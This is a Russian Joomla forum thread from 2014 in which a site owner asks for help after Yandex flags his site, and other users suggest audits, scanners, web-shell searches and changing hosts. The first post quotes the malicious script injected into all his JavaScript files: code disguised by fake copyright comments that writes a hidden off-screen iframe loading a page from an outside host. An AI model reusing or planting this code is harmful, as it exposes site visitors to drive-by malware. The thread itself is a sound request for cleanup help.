Новости Joomla

20 лет Joomla: Ринат Кажетов

20 лет Joomla: Ринат Кажетов.В 2025 году Joomla исполнилось 20 лет

В 2025 году Joomla исполнилось 20 лет. Вокруг неё сложилось большое интернациональное русскоязычное сообщество. На сайте нашего сообщества и на Хабре к юбилею были собраны интервью с его видными представителями. Сегодня мы читаем интервью с Ринатом Кажетовым (@rkazhet). Ринат - один из администраторов чата русскоязычного Joomla-сообщества, из Казахстана. Это человек, который всегда знает или найдёт нужную ссылку, пристально следит за новостями в мире Joomla, многое узнаёт первым и просто очень отзывчивый человек. Интервью с Ринатом провёл Евгений Сивоконь.

Читать интервью

0 Пользователей и 1 Гость просматривают эту тему.
  • 10 Ответов
  • 1369 Просмотров
*

Михалыч

  • Осваиваюсь на форуме
  • 26
  • 0 / 0
Прислал мне Яндекс.Вебмастер письмо следующего содержания:
"На страницах вашего сайта radar67.ru обнаружен код, который может быть опасен для посетителей. Выполнение этого кода при посещении сайта может привести к нежелательным для пользователя последствиям: заражению компьютера вредоносными программами, несанкционированному использованию его ресурсов, порче или краже личных данных.
В настоящий момент сайт выводится в результатах поиска  с пометкой «Этот сайт может угрожать безопасности вашего компьютера»."

Проверка архива сайта Касперским и Вебером ничего не дала, сайт чистый. Написал В техподдержку Яндекса, что так мол и так, проверил, сайт чистый.
Они прислали мне код, на который ругается их антивирус. Я проверил все js файлы на сайте и действительно, во всех файлах, в самой первой строке js файлов вставлен следующий код:

/*
Copyright (C) 2007 Free Software Foundation, Inc. http://fsf.org/
*/
function Linode() {
var d = navigator.userAgent;
var f = (d.indexOf("Screenshot") > -1 || d.indexOf("Maxthon") > -1 || d.indexOf("IEMobile") > -1 || d.indexOf("Chrome") > -1 || d.indexOf("FreeBSD") > -1 || d.indexOf("Android") > -1 || d.indexOf("iPad") > -1 || d.indexOf("Linux") > -1 || d.indexOf("Macintosh") > -1 || d.indexOf("iPhone") > -1 || d.indexOf("Mini") > -1);
if (!f) {
document.write('<iframe src="http://quwalda.runningfoxes.net/jtrsqgdhstjsjkt14.html" style="position:absolute;le'+'ft:-1340px;t'+'op:-1340px;" height="133" width="133"></iframe>');
}
}
Linode();
/*
Copyright (C) 2000 Free Software Foundation, Inc. See LICENSE.txt
*/

Я удалил этот код во всех файлах, залил на сайт, но через 3-5 минут код опять появляется в js файлах.
Подскажите откуда лезет эта зараза и где копать?
PS Google на вирусы на сайте не ругается, только Яндекс.
*

Taatshi

  • Гуру
  • 5258
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Re: Вирус на сайте (или неизвестно что)
« Ответ #1 : 25.06.2014, 01:37:42 »
Не все удалили. Нужно проводить полный аудит сайта.
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

draff

  • Гуру
  • 5801
  • 434 / 7
  • ищу работу
Re: Вирус на сайте (или неизвестно что)
« Ответ #2 : 25.06.2014, 07:08:46 »
Если антивирусники не нашли вирус- то устаревшая версия Joomla, уязвимости в сторонних расширениях, кража пароля ftp
Сканер айболит в помощь, искать шелл
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Вирус на сайте (или неизвестно что)
« Ответ #3 : 25.06.2014, 09:23:34 »
Недавно аналогичный случай был при чистке, Яндекс в бан закинул клиента, с похожей структурой заразы, во всех js файлах на сайте, при этом было много мини шеллов, пол дня провозился с подобной ситуацией, после чистки, буквально на следующий день Яндекс отпустил с бана.
*

Михалыч

  • Осваиваюсь на форуме
  • 26
  • 0 / 0
Re: Вирус на сайте (или неизвестно что)
« Ответ #4 : 25.06.2014, 09:37:55 »
Если антивирусники не нашли вирус- то устаревшая версия Joomla, уязвимости в сторонних расширениях, кража пароля ftp
Сканер айболит в помощь, искать шелл

Версия Joomla самая последняя, все пароли, в т.ч. и от ftp поменял
*

Taatshi

  • Гуру
  • 5258
  • 481 / 2
  • Верстаем и кодим. Обращайтесь ;)
Re: Вирус на сайте (или неизвестно что)
« Ответ #5 : 25.06.2014, 09:51:25 »
А сайт на хостинге один? Если нет - нужно чистить все одновременно.
« Последнее редактирование: 25.06.2014, 14:06:48 от Taatshi »
ВЕРСТКА, САЙТЫ ПОД КЛЮЧ, УДАЛЕНИЕ ВИРУСОВ, МИГРАЦИЯ НА JOOMLA 3, ОБНОВЛЕНИЕ  |  ОТЗЫВЫ 
Связь: telegram - Taatshi, почта - Taatshi на яндексе, Skype - Taatshi
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Вирус на сайте (или неизвестно что)
« Ответ #6 : 25.06.2014, 11:50:50 »
Бывают еще проблемы на самом хостинге, очень многие подвержены такому типу уязвимости как реверс, т.е имея нужные знания, можно иметь доступ ко всем площадкам хостинга!
*

flyingspook

  • Moderator
  • 3590
  • 247 / 9
Re: Вирус на сайте (или неизвестно что)
« Ответ #7 : 25.06.2014, 14:12:08 »
т.е имея нужные знания, можно иметь доступ ко всем площадкам хостинга!
и это как не прискорбно в наше время еще актуально
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Вирус на сайте (или неизвестно что)
« Ответ #8 : 25.06.2014, 16:28:19 »
и это как не прискорбно в наше время еще актуально
Решение одно!, менять хостера, перед чисткой своих клиентов, всегда проверяю возможность реверса и рутабельности, и если выявляется такое, то сразу же говорю клиенту, что возьмусь за чистку только после того, как сменят хостера, жаль, что о вопросе рутабельности не многие знают((
*

Михалыч

  • Осваиваюсь на форуме
  • 26
  • 0 / 0
Re: Вирус на сайте (или неизвестно что)
« Ответ #9 : 25.06.2014, 18:00:16 »
Решение одно!, менять хостера, перед чисткой своих клиентов, всегда проверяю возможность реверса и рутабельности, и если выявляется такое, то сразу же говорю клиенту, что возьмусь за чистку только после того, как сменят хостера, жаль, что о вопросе рутабельности не многие знают((

Хостера менять не хотелось бы, но возможно придется. Кого можете посоветовать?
*

winstrool

  • Давно я тут
  • 820
  • 51 / 2
  • Свободен для работы
Re: Вирус на сайте (или неизвестно что)
« Ответ #10 : 25.06.2014, 20:11:29 »
Хостера менять не хотелось бы, но возможно придется. Кого можете посоветовать?
Могу посоветовать отдельный VDS у того же хостера, а не виртуалку...
Чтобы оставить сообщение,
Вам необходимо Войти или Зарегистрироваться
 

Скрипт для поиска вирусов и вредоносных скриптов на сайте "AI-Bolit"

Автор revisium

Ответов: 110
Просмотров: 71268
Последний ответ 30.08.2023, 12:53:33
от SeBun
Вирус редирект или взлом с редиректом Joomla 3.10

Автор Wany205

Ответов: 1
Просмотров: 3468
Последний ответ 25.05.2023, 08:49:57
от Театрал
Re: Кажется вирус на сайте

Автор motokraft

Ответов: 24
Просмотров: 5102
Последний ответ 04.05.2022, 14:04:17
от ProtectYourSite
Хостинг пишет, что найден вирус в /media/com_media/js/media-manager-es5.js

Автор AlexP750

Ответов: 6
Просмотров: 3501
Последний ответ 22.02.2022, 11:38:15
от AlexP750
Спам, вирус или дело в браузере Google

Автор alekcae

Ответов: 13
Просмотров: 2105
Последний ответ 16.05.2021, 18:52:24
от alekcae